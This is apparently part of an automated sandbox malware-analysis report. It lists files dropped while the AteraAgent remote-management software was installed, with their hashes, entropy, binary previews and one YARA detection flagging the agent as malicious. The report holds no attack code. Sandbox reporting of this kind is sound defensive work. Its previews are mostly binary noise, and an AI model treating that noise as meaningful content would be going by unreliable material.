                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\SourceHash{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.1718511608690974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjdAGiLIlHVRpph/7777777777777777777777777vDHFN1P0onWl0i8Q:JTQI5dqorF
                                                                                                                                                                                                                                        MD5:38ABFA695EE09E39044E0F634F587D33
                                                                                                                                                                                                                                        SHA1:5E60E7D44DFB4900CE6A3C9E4E6968659E53622B
                                                                                                                                                                                                                                        SHA-256:0B3CF480B0B1ABF2738F30F203B1A340B8B2A4C6F24FD4120B6D5DB95FB222B3
                                                                                                                                                                                                                                        SHA-512:E4542A69CA238C11AF8C29DD9D6EC288FEA4601B3ECA8F9BDB46CDEDB1EE6700DCC806057D5690E17D677EC173CC905E642925618D2CF737ED7D6BD2FF785456
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.1804187676021298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjKSAGiLIlHVRp/h/7777777777777777777777777vDHF6oe7tuYaBoIk:JXQI57soemob8F
                                                                                                                                                                                                                                        MD5:7397ACC06919DAC17B2E0028DA08D3E2
                                                                                                                                                                                                                                        SHA1:E3391C06DBC0D060478A0D22FBBD42FED4015DD3
                                                                                                                                                                                                                                        SHA-256:332648007602B9B91C9984D3B30A8E6C9AC3BDE99DC9E2BEB106B86586D9FF0C
                                                                                                                                                                                                                                        SHA-512:62E0913897DC17DD6BB20DC18C57ADE164000D375AE931EA72F2F074B932825B3951571B818985C67BA1468B7066BCAB11C7B893A3F03B72AC3EB6620AA7E00D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6094349994868145
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:l8PhmuRc06WXzAFT5od/8BaSjndd4d/EqdcrGbQySsndd4dNWeUJCQ:Ihm11FTq/8Ba9ZcyNXezQ
                                                                                                                                                                                                                                        MD5:5352E3DE4E5267D3CF34CF77FFDBA888
                                                                                                                                                                                                                                        SHA1:B3CEA9DE058F989D22C8F61ED66B2A6D0F10369F
                                                                                                                                                                                                                                        SHA-256:E1B03A636C107D82092D7DD63B0865624ABFCF08C44446CA062C2B6241E0B676
                                                                                                                                                                                                                                        SHA-512:53A1CE13B64ACEC9F6BB34FE3F869E448ED5010CA0A0B0F29181B54FBDB52550ADC46B3ACC4AA886900D500372D92F7CFDC167742819EF106ACF8A3081FF9A2B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):360001
                                                                                                                                                                                                                                        Entropy (8bit):5.362976518960195
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaud:zTtbmkExhMJCIpEk
                                                                                                                                                                                                                                        MD5:5CCA446E37B586FE91C0C55C904647DE
                                                                                                                                                                                                                                        SHA1:DBB186BCF92CABE7090ED292F468776548DF3EB6
                                                                                                                                                                                                                                        SHA-256:552C7C857D41AC1B88E1B47FD9F5625C569032B95FDA2ECB2D44B4FEFB3CFB7D
                                                                                                                                                                                                                                        SHA-512:18581AFEF4380DF870D71D71F0D139ABCF0A43CC89BA379B83D3FE07F9454E0C74C6D45BBFA87CEE4D759428E9925094905E36884CA9B37447C1FE3B864E35BC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                                                                                                        C:\Windows\System32\InstallUtil.InstallLog

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704
                                                                                                                                                                                                                                        Entropy (8bit):4.805280550692434
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:tIDRFK4mAX7RBem7hccD+PRem7hUhiiGNGNdg6MhgRBem7hccD+PRem7hUGNGNkm:Us43XVBVhcmMRVhMipNVeBVhcmMRVhro
                                                                                                                                                                                                                                        MD5:EF51E16A5B81AB912F2478FE0A0379D6
                                                                                                                                                                                                                                        SHA1:B0F9E2EE284DD1590EA31B2D3AD736D77B9FC6A7
                                                                                                                                                                                                                                        SHA-256:2C5D5397CEDF66DB724FED7FB4515B026A894F517A0DFBE8AE8ADF52DB61AA22
                                                                                                                                                                                                                                        SHA-512:296A11DB55BFEE7D87897BB63BC9E2C05786D3FD73A894DA5AF76F7A756495C6CCC0959C88844DFB5560DE2374A257201D960E004EC09D8C9DFB50952C5EF2D2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...Running a transacted installation.....Beginning the Install phase of the installation...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Install phase completed successfully, and the Commit phase is beginning...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Commit phase completed successfully.....The transacted install has completed...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):471
                                                                                                                                                                                                                                        Entropy (8bit):7.15290820119303
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JyYOjMt5GLsHjcHYixuRLQedEd3FOVHDE+U3p0P:JRO4tILs4duZEbOx1U3p+
                                                                                                                                                                                                                                        MD5:4C990137B89FAFD01ECAE5016D2F3CFF
                                                                                                                                                                                                                                        SHA1:0965AB0ECF0AA52E373C181C5B9A443657C53E29
                                                                                                                                                                                                                                        SHA-256:62F399068685A22C5899972BA8A0B0D70499C75C66B4313CB748452C76EB0308
                                                                                                                                                                                                                                        SHA-512:A61AF1B036B455A9F8A30436A37C9FCAFCF314C86EDCD3772A047C78C9DAB536849C14AF28648974A9ABCB2788D56BBF5DDD9EB8E035688791CCA36DCB9623E2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0..........0.....+.....0......0...0......E....1-Q...!..m....20241001165849Z0s0q0I0...+...........@..D3=?..Mn8...Q..E....1-Q...!..m..........-...P..@.Z....20241001165849Z....20241008165849Z0...*.H.............'a......>..$.e.H...0....T'9.....j..M".8^....Y.....W....~F.>..,...'.;.M..W.........-.....c..N...8;T..)38......?.EW..xo........ ..~..%....s[?@.u.7..s..h.]t3....dJ.2M.Q....[.....t.?.9.#.V.0.VE6....z.%.a..1X.$*B.!....h@...(.sM...P..5x..^..

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                        Entropy (8bit):7.552074964556022
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5o6Tq91IX5h44TUqrlPdU/uRIFBDNAHrrsAqldCcE9WPNXkPxj/Zf:5uIoqro/uuBR6rsAYE9COxj/J
                                                                                                                                                                                                                                        MD5:E00FF3213C8F42F9482FC7DD36AEE060
                                                                                                                                                                                                                                        SHA1:388BCAC84BAECF2E39C97858BDCD40FFF16CC7DB
                                                                                                                                                                                                                                        SHA-256:9C9637A1B89B95A2CEC6E6478414BBCC8790DDC2AA8065874F3BA81FF89F8272
                                                                                                                                                                                                                                        SHA-512:37594DE9CF6B0ABE66BEB45E754203957C92F31696BA7939E46A9E1ACB5EC271740804B91F49C319053AEFC1639A253E70C42090A80E7AB1B4F57E1EFB857965
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20241001203658Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB...(I.x...#...R....20241001202101Z....20241008192101Z0...*.H.............*.m...Y]"..9#Q.Q.....z..MB....@...... .82..|..y.k.t..1V...D`...........z.*.........j.(...H.."...xA. ....~.q.2e7........`...`dW...iW.P.F..:gOkG....{.{..dx.n...S(. F1[)...w.m.4..L......FP..?.#....;i.;.`.u*X(.nG...(.G.D. ,..Q7Yl;..z`?.L?...}.[..D........}...j..d..h.......;..OqX4|..n[KQHi.F&<..X.M..dYo0..A2.!.T.q..FNy.Ec.S.F.......\.O;#...P.).:.h.iRjW...D.n.7S......".c.}...p8d.......m...+.PT..v8.....!.....T..%......[......r3.]......9.#.u4.....[..:.Q..Q..9.4#~...A......0.oJ..$.i.~.3.

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):737
                                                                                                                                                                                                                                        Entropy (8bit):7.511055585378104
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:yeRLaWQMnFQlRNWFfBqDm6YFC15H3giR2KO2hNbJxFEtqcQzovCQYmBQzM47+h:y2GWnSNWtouoH3S2btxOZQUvCQQh+
                                                                                                                                                                                                                                        MD5:6DF9DD91D83A951DF95CE3E1A13E5212
                                                                                                                                                                                                                                        SHA1:0D324D6A33DAB091E0712D8D088206984D5BB39B
                                                                                                                                                                                                                                        SHA-256:35A90524E9C17EAA14B9B6810749D9B61A8FB3A5DAD0ABF8FE392B32DDC80642
                                                                                                                                                                                                                                        SHA-512:2E9A4CDEA7875E34AB13E1675795B527851D6E38345E40EF55B2F44E11486E73805DD25B92C78F82DB40562684F3B6273E418C24B0EB8D27D55265F8882DE343
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..241001210859Z..241022210859Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............l-....N..........d.m.i..%.nr......x}F(./.V.y_......K..68...Z...~..M*x..>].u$G...#JG..s.u..h......p..b...s..{....S'.........a.......12.)PK...^..c..u.C.".c.ZY..y.e.0F).....n/...{Ii...._........[.b..L..m..q....|`.$.J..oW.~.H....|`^.....-u.JOBC.}.K.gl.M.} .N.2H...'AIV.j.jkd.KKf.......K..xvfdd.v.>.t..H.....t.x5.....6...D..........wDubyL.{..ES......"z..!o8g...f8...3.........%&.....1.,..K|..~.2..wul....3.9.. .dw{......j;...J.....z....9.....(.....A.'........./.K...O.-.....c...{&M..y.

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                        Entropy (8bit):7.552295515462603
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5onfZHlc5RlRtBfQtlUxsywrhX0DHXXD6svZJ7YCSVXAdaAaN7tEn/BTGpq78S5z:5iplcdZslUxWQWSiVXAD2ZEZic8wz
                                                                                                                                                                                                                                        MD5:D3E1E6C22706565D07C5B9CF083E39F6
                                                                                                                                                                                                                                        SHA1:12D3BC9406E47A98818A8E21DEEED08DAF79B029
                                                                                                                                                                                                                                        SHA-256:AA5381F9A094B86DEE378100BA11AF301FA9B2E0B5E508D6023E06CCD3A2A60B
                                                                                                                                                                                                                                        SHA-512:BCA97221A6320F9C29A237D2F6FD824713072549F2EB879C963D2C8326493FCD03CEB3B94E737ADE4A312CB8331B14865F2F208A73F566A6E08786577FE3B273
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20240930184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20240930184215Z....20241007184215Z0...*.H.............X.Z..hT.F...^.g..n......W.%T.;~.|LU.......aCW...[....-.k.*F..)C........@..:.3)....^.4....G.R.PD...#Z...7@..!Ub....<.J..vXE...6..I........6..H.'.@.1l..v..]P....tm!..............z..!...%7^[...)..p..Vzn....ML.....]].KN|...tF.8.cN....bt.9..Q.......e.T@.8A..A.uN..*1.4.....U.x}n..F....g..|.......P.|...G......:.F.w,....mj.kj>..2=9.*.Q.J..#..Jc......O.....a....Z...f....e.^.=...$`.~Z;u.?8..!@...J<e.tiTg.....qzDe.hn.......b...Xy...S.FE....=Q.....~.p|5.6....KN..p.6y..\K........:.T.......q.

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                                        Entropy (8bit):3.453652333040854
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKdQ89/sJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:im/HkPlE99SCQl2DUevat
                                                                                                                                                                                                                                        MD5:EB1E9BB3CFF20C1B0C49AB7805235D6E
                                                                                                                                                                                                                                        SHA1:50758356E89C76FC821D0094A9BCEFA6CB54F82A
                                                                                                                                                                                                                                        SHA-256:CC834DA9D54538F7DDF6B6FBC4A7E7EC802F96AE80A2B226C11A85A99E994AEE
                                                                                                                                                                                                                                        SHA-512:F893802C10F3A715E5DA58BE0BC623E09D16065DD9F5B4D82190D22204042C9BD83554C4774E710295026DF924EC091CC48D3DE246A7CE812E78764EDC037116
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ................(.................................................|.d... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):400
                                                                                                                                                                                                                                        Entropy (8bit):3.9736224693495865
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKOfmd1I88HF7rXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:2OW79mxMiv8sFzD3quqDkPh8Y2ZM
                                                                                                                                                                                                                                        MD5:657125401519AF99C01F55404797DEA2
                                                                                                                                                                                                                                        SHA1:9C3BBC030A7D0BCD072865806492B98A8365326C
                                                                                                                                                                                                                                        SHA-256:9B23ADC2F301F6B119D6BAD331B6BF74A3A68C812817344B7EE8C0289D238CAD
                                                                                                                                                                                                                                        SHA-512:9932336DC11F65D26F6F39ABC379BFBD7D8416AEA422F45BBB4AAE2E57562ADE3EA585F9BF217163626C91DE30FF4B9F75C6B52D8A6A880AE04773E3CFBD773C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
